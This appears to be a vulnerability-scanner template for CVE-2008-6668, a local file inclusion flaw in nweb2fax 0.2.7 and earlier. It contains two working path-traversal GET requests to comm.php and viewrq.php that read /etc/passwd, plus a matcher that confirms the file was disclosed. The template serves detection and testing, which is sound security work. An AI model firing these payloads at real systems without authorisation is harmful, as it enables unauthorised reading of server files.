id: CVE-2008-6668 info: name: nweb2fax <=0.2.7 - Local File Inclusion author: geeknik severity: medium description: nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via the id parameter submitted to comm.php and the var_filename parameter submitted to viewrq.php. reference: - https://www.exploit-db.com/exploits/5856 - https://exchange.xforce.ibmcloud.com/vulnerabilities/43173 - https://nvd.nist.gov/vuln/detail/CVE-2008-6668 - https://exchange.xforce.ibmcloud.com/vulnerabilities/43172 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2008-6668 cwe-id: CWE-22 epss-score: 0.00359 cpe: cpe:2.3:a:dirk_bartley:nweb2fax:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: dirk_bartley product: nweb2fax tags: cve2008,nweb2fax,lfi,traversal,edb,cve http: - method: GET path: - "{{BaseURL}}/comm.php?id=../../../../../../../../../../etc/passwd" - "{{BaseURL}}/viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd" matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - type: status status: - 200